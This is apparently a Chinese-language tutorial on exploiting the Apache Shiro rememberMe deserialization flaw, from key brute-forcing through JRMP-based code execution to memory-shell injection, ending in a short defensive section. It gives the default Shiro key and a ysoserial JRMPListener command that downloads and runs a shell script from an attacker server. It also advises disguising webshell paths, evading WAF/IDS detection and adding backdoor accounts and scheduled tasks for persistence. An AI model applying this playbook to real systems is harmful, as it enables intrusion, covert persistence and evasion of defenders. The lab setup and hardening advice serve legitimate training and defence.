当前位置：首页 > news >正文

Shiro反序列化漏洞实战：从JRMP探测到内存马注入的完整攻防演练

news 2026/6/20 18:02:02

1. 项目概述：从标题看一次完整的Shiro漏洞攻防演练

看到“Shiro_tool+JRMP协议快速探测Shiro漏洞”这个标题，很多搞安全测试和渗透的朋友应该会心一笑。这几乎是一个经典到不能再经典的场景了：面对一个使用了Apache Shiro框架的Web应用，如何快速判断它是否存在那个著名的反序列化漏洞（CVE-2016-4437等），并进一步利用JRMP协议进行漏洞验证，甚至在必要时植入内存马。这不仅仅是漏洞复现，更是一套从信息收集到利用验证的完整实战流程。我处理过不少内网渗透和红队评估项目，Shiro框架的漏洞因其影响广泛、利用链成熟，一直是重点检查对象。这篇文章，我就结合自己踩过的坑和总结的技巧，把这个流程掰开揉碎了讲清楚，目标是让你看完就能上手，在授权测试中快速定位和验证Shiro的安全风险。

简单来说，这个过程可以拆解为三个核心环节：首先是探测，确认目标系统使用了Shiro且默认的加密密钥（AES Key）是否可被预测或泄露；其次是利用，通过构造特殊的序列化数据，利用JRMP协议让目标服务器连接我们控制的恶意服务端，从而执行命令；最后是持久化，在获取权限后，如何通过注入内存马的方式，在服务器不重启、不落盘的情况下维持访问。整个链条环环相扣，工具（Shiro_tool）和协议（JRMP）是其中的关键“利器”。接下来，我们就一步步深入。

2. 核心原理与工具链拆解：为什么是Shiro、JRMP和内存马？

在动手之前，我们必须搞清楚背后的“为什么”。盲目操作不仅效率低，遇到问题更会一头雾水。

2.1 Apache Shiro框架与反序列化漏洞的根源

Apache Shiro是一个强大且易用的Java安全框架，提供身份认证、授权、加密和会话管理。它的会话管理有一个特点：为了在集群等无状态环境中工作，Shiro会将用户的会话（Serializable对象）序列化后，使用AES加密，再通过Cookie（rememberMe）返回给客户端。下次请求时，客户端携带这个Cookie，Shiro解密、反序列化后还原会话。

漏洞就出在这里。关键在于AES加密的密钥（Key）。在早期版本中，Shiro使用了一个硬编码在代码中的默认密钥（kPH+bIxk5D2deZiIxcaaaA==）。如果开发人员没有在配置文件中显式地修改这个密钥，那么攻击者就可以使用这个默认密钥，自己构造一个恶意的序列化对象，加密后塞进rememberMeCookie发送给服务器。服务器会用默认密钥解密，并毫无防备地进行反序列化操作。

Java反序列化本身不是漏洞，但它是一个危险的“入口”。当反序列化一个由攻击者精心构造的、包含特定“利用链”（Gadget Chain）的对象时，就可能触发远程代码执行（RCE）。经典的利用链如CommonsCollections（CC链），就是利用Apache Commons Collections库中的一些类特性，在反序列化过程中层层调用，最终达到执行任意命令的目的。

注意：并非所有Shiro都有漏洞。漏洞存在的核心前提是：1. 使用了默认或弱密钥；2. 目标ClassPath中存在可用的反序列化利用链（如commons-collections, commons-beanutils等）。因此，探测的第一步就是碰撞密钥和检测利用链。

2.2 JRMP协议在漏洞利用中的角色

直接通过rememberMeCookie发送一个完整的、包含命令执行代码的序列化载荷（Payload）行不行？理论上可以，但实际中常常因为Payload过大（超过Cookie长度限制）、或需要动态生成命令而受限。

这时，JRMP（Java Remote Method Protocol）就登场了。它是Java RMI（远程方法调用）底层使用的协议。在我们的利用场景中，JRMP扮演了一个“二次引导”的角色。我们不再直接发送执行命令的Payload，而是发送一个特殊的“诱导”Payload。这个Payload被反序列化后，会指示受害服务器的Java环境，去连接一个由我们控制的、恶意的RMI服务端（即JRMP Listener）。

当受害服务器连接到我们的恶意RMI服务端时，它会尝试从我们的服务端“拉取”（fetch）一个远程对象。此时，我们的恶意服务端就可以将真正包含命令执行代码的序列化对象“推送”给受害者。受害者会在处理这个远程对象的过程中再次触发反序列化，从而执行我们预设的命令。

这样做的好处显而易见：

绕过长度限制：初始的诱导Payload很小，容易通过Cookie传递。
动态性强：命令可以在我们控制的JRMP Listener端动态生成和响应，更加灵活。
适应复杂环境：在某些网络环境下，这种“出站连接”的方式可能比直接接收复杂Payload更易成功。

2.3 内存马：无文件持久化驻留的利器

通过上述步骤，我们可能获得了一个命令执行窗口（例如回显了一个whoami）。但这往往是临时的，与一次Web请求的生命周期绑定。要想获得一个稳定的、隐蔽的后门，就需要“内存马”。

内存马，顾名思义，是驻留在服务器内存中的Web后门。它不向磁盘写入任何文件，而是通过Java的机制（如动态注册Filter、Servlet、Controller、Interceptor等），将恶意代码注入到正在运行的Web应用容器中。这样，只要容器不重启，我们就可以通过访问特定的URL路径，随时触发恶意代码执行。

在Shiro漏洞利用后注入内存马，是一个很自然的后续操作。因为我们已经具备了执行任意Java代码的能力，完全可以在目标应用的JVM中，利用反射等机制，动态地向当前Web容器（如Tomcat、Spring）注册一个恶意的Filter或Servlet。这个Filter会拦截所有请求，根据请求中的特定参数执行命令并回显结果，实现“无文件”的持久化控制。

2.4 工具链：Shiro_tool与相关生态

“Shiro_tool”通常指代一系列用于检测和利用Shiro漏洞的开源工具，例如shiro_attack、shiro-exploit等。它们一般集成了以下功能：

密钥爆破：使用内置的常见密钥字典，通过发送特制的Padding Oracle攻击包或有效的序列化数据包，来碰撞出正确的AES密钥。
利用链检测：检测目标ClassPath中是否存在可用的反序列化利用链（如CC1, CC2, CB1, CB2等）。
Payload生成与利用：集成生成JRMP等不同协议Payload的功能，并一键启动对应的监听器。
内存马管理：提供生成和注入常见类型内存马（如Filter型、Servlet型、Spring Controller型）的Payload，并可能提供管理界面。

在实战中，我们往往会组合使用多个工具。例如，用一款工具进行快速探测和密钥爆破，用另一款更专业的工具（如ysoserial）生成JRMP Payload，再用Godzilla（哥斯拉）或Behinder（冰蝎）的客户端来连接注入的内存马。理解每个工具的核心用途，比死记硬背某个工具的命令更重要。

3. 实战环境准备与目标信息收集

纸上谈兵终觉浅，我们直接进入实战环节。首先，你需要一个合法的测试环境。强烈建议使用Vulhub、DVWA等靶场环境进行学习，切勿对未授权目标进行测试。

3.1 测试环境搭建

这里以Vulhub中的Shiro漏洞靶场为例，这是最快捷的方式。

# 1. 安装Docker和Docker-compose # 2. 下载Vulhub git clone https://github.com/vulhub/vulhub.git cd vulhub/shiro/CVE-2016-4437 # 3. 启动靶场 docker-compose up -d # 4. 查看靶场地址，通常是 http://your-ip:8080

启动后，访问目标地址，你会看到一个带有登录页面的Web应用。这就是我们的“假想敌”。

3.2 基础信息收集与Shiro指纹识别

在发起攻击前，基础信息收集至关重要。

手动识别Shiro：
- Cookie特征：在浏览器中访问目标，打开开发者工具（F12）查看Network标签。发送一个请求，观察响应头或请求头中的Set-Cookie字段。如果存在一个名为rememberMe的Cookie（值可能为deleteMe或一串加密字符），那么目标很可能使用了Shiro。
- 登录失败回显：在登录页面输入错误密码提交，观察回显信息。Shiro框架可能有特定的错误关键词，如org.apache.shiro。
- 路径探测：尝试访问一些Shiro相关的默认路径或错误路径，如/login.jsp等，观察特征。
使用工具进行指纹识别：
- 你可以使用Burp Suite的被动扫描，或者使用whatweb、Wappalyzer等浏览器插件进行初步技术栈识别。
- 专门的Shiro检测工具或脚本，通常第一步就是发送一个特制的请求，通过响应特征（如状态码、返回包长度、rememberMeCookie的行为）来判断。

实操心得：在实际的渗透测试中，目标可能部署在反向代理（如Nginx）后面，或者rememberMe功能被禁用，导致特征不明显。此时需要结合端口扫描（常见Java应用端口如8080, 8443, 7001）、页面特征（特定的JS库、错误样式）进行综合判断。不要因为没看到rememberMeCookie就轻易放弃。

4. 核心攻击流程详解：探测、利用、注入

假设我们已经初步判定目标使用了Shiro，接下来进入核心环节。

4.1 第一步：使用Shiro_tool进行密钥与利用链爆破

这里以一款集成的图形化工具shiro_attack（v2.0及以上版本）为例，它集成了探测、利用、内存马注入等功能，对新手比较友好。

启动工具并配置目标：运行工具，在目标地址栏输入http://target-ip:port。其他参数如超时时间可以保持默认。
开始检测：点击“检测”或类似的按钮。工具会自动化执行以下步骤：
- 发送一个无害的序列化Payload，验证目标是否处理rememberMeCookie。
- 使用内置的密钥字典（包含100多个常见密钥，如默认密钥、网上泄露的密钥、常见弱密钥等）进行爆破。其原理是发送一个使用特定密钥加密的、结构已知的序列化数据，如果服务器解密成功并触发了反序列化（可能产生特定错误或延迟），则认为该密钥有效。
- 在爆破出有效密钥后，会进一步检测当前目标环境中可用的反序列化利用链（如CC链、CB链等）。它会依次尝试发送不同利用链的简单测试Payload（例如执行一个ping命令到dnslog平台），根据dnslog是否有回显来判断链是否可用。

关键参数与过程解析：

密钥字典：工具的准确性很大程度上依赖于密钥字典的完备性。你可以手动维护和扩充自己的密钥字典，将项目中收集到的、网络上公开的密钥添加进去。
DNSLog：这是检测利用链是否可用的关键技术。工具会使用一个DNSLog平台（如ceye.io或自建的dnslog.cn），Payload中执行的命令是ping或nslookup一个由你指定的、唯一的子域名。如果目标存在漏洞并执行了命令，就会向这个子域名发起DNS查询，DNSLog平台就能记录到这次查询，从而证明漏洞存在且命令可执行。
- 操作：在工具中配置你的DNSLog平台地址和Token，工具会自动生成唯一的子域名并嵌入Payload。

常见问题与排查：

问题：工具一直显示“检测中”或“未检测到漏洞”。
- 排查1：检查网络连通性。确保你的攻击机可以访问目标服务器的IP和端口。
- 排查2：目标可能设置了严格的超时时间或拦截了异常请求。尝试调整工具的超时参数（如从5秒调到10秒）。
- 排查3：目标的Shiro版本可能较高，修复了默认密钥问题，且使用了强密钥。此时密钥爆破成功率极低。需要转向信息收集，尝试从源码泄露（如.git）、配置文件泄露等途径获取密钥。
- 排查4：目标ClassPath中可能不存在任何常见的利用链（如服务器仅使用了核心Shiro jar，未引入commons-collections等库）。这种情况下，即使密钥正确，也无法直接利用。需要寻找其他利用链（如利用Tomcat EL处理器、JDK原生链等），这对工具和攻击者的要求更高。
问题：检测到了密钥，但所有利用链都显示不可用。
- 排查：这很常见。可能是目标环境没有相应的依赖库。此时可以尝试“回显”Payload。一些高级工具提供了“通用回显”Payload，它不依赖特定的第三方库，而是尝试利用Tomcat、Spring等Web容器本身的特性来输出命令执行结果到HTTP响应中。在工具中切换到“回显”模式再试。

4.2 第二步：利用JRMP协议进行命令执行

当工具成功检测到有效的密钥和可用的利用链（例如CommonsCollections2）后，我们就可以进行深入的利用。

选择JRMP利用方式：在shiro_attack的利用模块，选择“JRMP”或类似的标签页。
启动JRMP监听器：
- 在工具内部或外部，你需要启动一个JRMP监听服务。shiro_attack通常集成了这个功能。你需要指定一个监听端口（如1099）。
- 更底层的操作是使用ysoserial工具：java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections2 “curl http://your-vps/shell.sh | bash”。这条命令会在1099端口启动监听，并使用CC2链生成一个执行指定命令的Payload，等待受害者连接。
生成并发送JRMP Payload：
- 在工具的JRMP利用界面，填写你的攻击机IP和JRMP监听端口（如your-vps-ip:1099）。
- 选择对应的利用链（需与JRMP监听器使用的链一致）。
- 点击“生成”或“攻击”。工具会使用之前爆破出的密钥，加密一个特殊的“JRMP诱导”Payload，并将其作为rememberMeCookie的值，发送给目标服务器。
接收连接并执行：
- 如果一切顺利，目标服务器在反序列化这个Cookie后，会向你的your-vps-ip:1099发起JRMP连接。
- 你的JRMP监听器收到连接后，会将之前准备好的、包含实际命令的序列化对象发送给目标。
- 目标服务器在处理这个对象时再次触发反序列化，最终执行你预设的命令（例如反弹一个Shell，或者下载并执行后续Payload）。

实操心得与避坑指南：

网络拓扑：这是最容易出错的地方。你的攻击机（运行JRMP Listener的机器）必须能被目标服务器访问到。如果目标在内网，你的攻击机也需要在内网，或者你需要通过端口映射、反弹代理（如frp,ngrok）将你的JRMP监听端口暴露到公网。
防火墙与杀软：目标服务器的出站流量可能被防火墙限制，无法连接到你的JRMP端口。常见的RMI端口（1099, 1100等）可能被拦截。可以尝试使用其他非常用端口（如12345,54321）。
Java版本：不同的利用链对Java版本有要求。例如，CC2链在Java 8u76以下版本利用成功率较高。高版本Java可能由于安全机制（如JEP 290）导致利用失败。需要根据目标环境调整利用链，或寻找绕过方法。
命令构造：在JRMP Listener中构造的命令，要确保能在目标系统上执行。Linux和Windows的命令语法不同。可以通过id、whoami等简单命令先测试。

4.3 第三步：注入内存马实现持久化

通过JRMP执行命令，我们可能获得了一个临时Shell。但为了更稳定、更隐蔽地控制，我们需要注入内存马。

选择内存马类型：在shiro_attack或类似工具中，会有“内存马”模块。常见的类型有：
- Filter型内存马：最通用，兼容性好。通过动态注册一个恶意Filter到Tomcat的FilterChain中，拦截所有请求。
- Servlet型内存马：动态注册一个Servlet到指定路径。
- Spring Controller型内存马：针对Spring MVC框架，动态注册一个Controller。
- Interceptor型内存马：针对Spring框架，动态注册一个拦截器。
- WebSocket型内存马：更隐蔽，但需要应用支持WebSocket。
- 冰蝎/哥斯拉内存马：直接生成与冰蝎、哥斯拉等Webshell管理工具兼容的内存马Payload，注入后可直接用对应客户端连接。
生成并注入内存马：
- 以Filter型内存马为例。在工具中选择该类型。
- 你需要设置几个关键参数：
  - 密码（Pass）：连接内存马时使用的认证密码，防止被他人意外访问。
  - 路径（Path）：内存马绑定的URL路径，例如/favicon或/health，选择一个看起来正常、不易被怀疑的路径。
  - 注入方式：工具通常提供“通过JRMP”或“通过命令执行”两种方式注入。因为我们上一步已经通过JRMP获得了命令执行能力，这里可以选择“命令执行”方式。工具会生成一段很长的、经过Base64编码和特殊处理的Java代码（或字节码）。
- 将生成的Payload，通过我们已获得的命令执行通道（比如用echo命令写入一个临时Java文件，或用java -jar直接执行）在目标JVM中运行。这段代码的核心逻辑是：使用Java的Thread.currentThread().getContextClassLoader()获取当前Web应用的类加载器，然后通过反射机制，获取到Tomcat的ApplicationContext，最终动态创建并注册一个实现了Filter接口的恶意类。
连接与管理内存马：
- 注入成功后，访问你设定的路径（如http://target-ip:port/favicon），并带上密码参数（如?pass=yourpassword），你应该能看到一个简单的命令执行界面，或者返回特定的成功标识。
- 如果注入的是冰蝎/哥斯拉内存马，则可以直接使用对应的客户端，填写URL、密码和密钥进行连接，获得一个图形化、功能强大的Webshell。

内存马注入的深度注意事项：

兼容性：内存马严重依赖目标Web容器的具体实现（Tomcat版本、Spring版本等）。工具生成的Payload可能不适用于所有环境。注入失败时，需要查看目标容器的错误日志，或尝试其他类型的内存马。
隐蔽性：
- 路径选择：不要使用/shell,/cmd这种明显路径。可以伪装成静态资源路径、健康检查路径或API路径。
- 流量特征：冰蝎、哥斯拉等工具的流量有一定特征，可能被WAF或IDS识别。可以考虑使用自定义的、加密的内存马，或通过代理对流量进行混淆。
- 进程排查：内存马在进程列表中不可见，但可以通过分析Java堆内存（如使用jmap -histo）查找可疑的类名，或使用Arthas等Java诊断工具动态排查已加载的类。
稳定性：内存马的生命周期与Web应用绑定。一旦应用重启（如Tomcat重启、服务器重启），内存马就会消失。因此，在获得持久化权限后，应考虑结合其他持久化手段，如写入计划任务、创建后门账户、部署持久化Webshell文件等，作为冗余备份。

5. 高级技巧、防御与拓展思考

掌握了基本流程，我们再来看看一些能提升效率和成功率的技巧，以及如何从防御角度思考。

5.1 高级利用技巧与绕过

密钥的进一步获取：
- 源码泄露：扫描.git,.svn,.DS_Store等目录，尝试下载源码，在配置文件（如shiro.ini,application.yml）中寻找密钥。
- 配置文件泄露：尝试访问/WEB-INF/classes/下的配置文件，或Spring Boot的/actuator/env端点（如果未授权访问），可能直接暴露shiro相关的配置属性。
- Padding Oracle攻击：对于某些Shiro版本，即使密钥未知，也可能通过Padding Oracle攻击模式来逐字节爆破出密钥。一些高级工具支持此模式。
无利用链的利用（回显利用）：当没有CommonsCollections等“传统”利用链时，可以尝试“通用回显”技术。其原理是利用Tomcat请求线程的Response对象，或者Spring的RequestContextHolder，将命令执行的结果直接写入HTTP响应中。shiro_attack等工具通常集成了几种回显Payload（如TomcatEcho, SpringEcho），可以逐个尝试。
高版本Java绕过： Java 8u121以后引入了JEP 290等反序列化过滤器，限制了RMI、LDAP等远程加载行为。针对JRMP利用，可以尝试：
- 使用UnicastRef等绕过方式（对应ysoserial中的JRMPClient2等Payload变种）。
- 寻找其他不受限制的利用链，或结合本地ClassPath中的类进行利用（即“不出网”利用）。

5.2 防御视角：如何保护你的Shiro应用？

作为开发或运维人员，了解攻击手段是为了更好地防御。

及时升级：将Apache Shiro升级到最新安全版本。官方早已修复了默认密钥问题，并引入了更强的安全机制。
使用强密钥：在Shiro配置中，务必使用自己生成的、足够复杂且保密的AES密钥。不要使用默认密钥或网上公开的密钥。
```
# shiro.ini 示例 securityManager.rememberMeManager.cipherKey = your_strong_base64_encoded_key_here
```
控制依赖：非必要不引入存在已知反序列化利用链的第三方库，如老版本的commons-collections,commons-beanutils等。如果必须使用，请升级到已修复漏洞的版本。
启用反序列化过滤器：在Java环境中配置全局的反序列化过滤器（JEP 290），只允许反序列化可信的类。
WAF与RASP：部署Web应用防火墙（WAF）可以拦截特征明显的攻击流量。运行时应用自我保护（RASP）能更深入地监控应用行为，在反序列化等危险操作执行时进行中断和告警。
最小权限原则：运行Java应用的账户应具有最小必要权限，降低被入侵后的影响范围。
定期安全扫描：使用SCA（软件成分分析）工具扫描项目依赖中的已知漏洞，使用IAST（交互式应用安全测试）或漏洞扫描器对应用进行定期安全测试。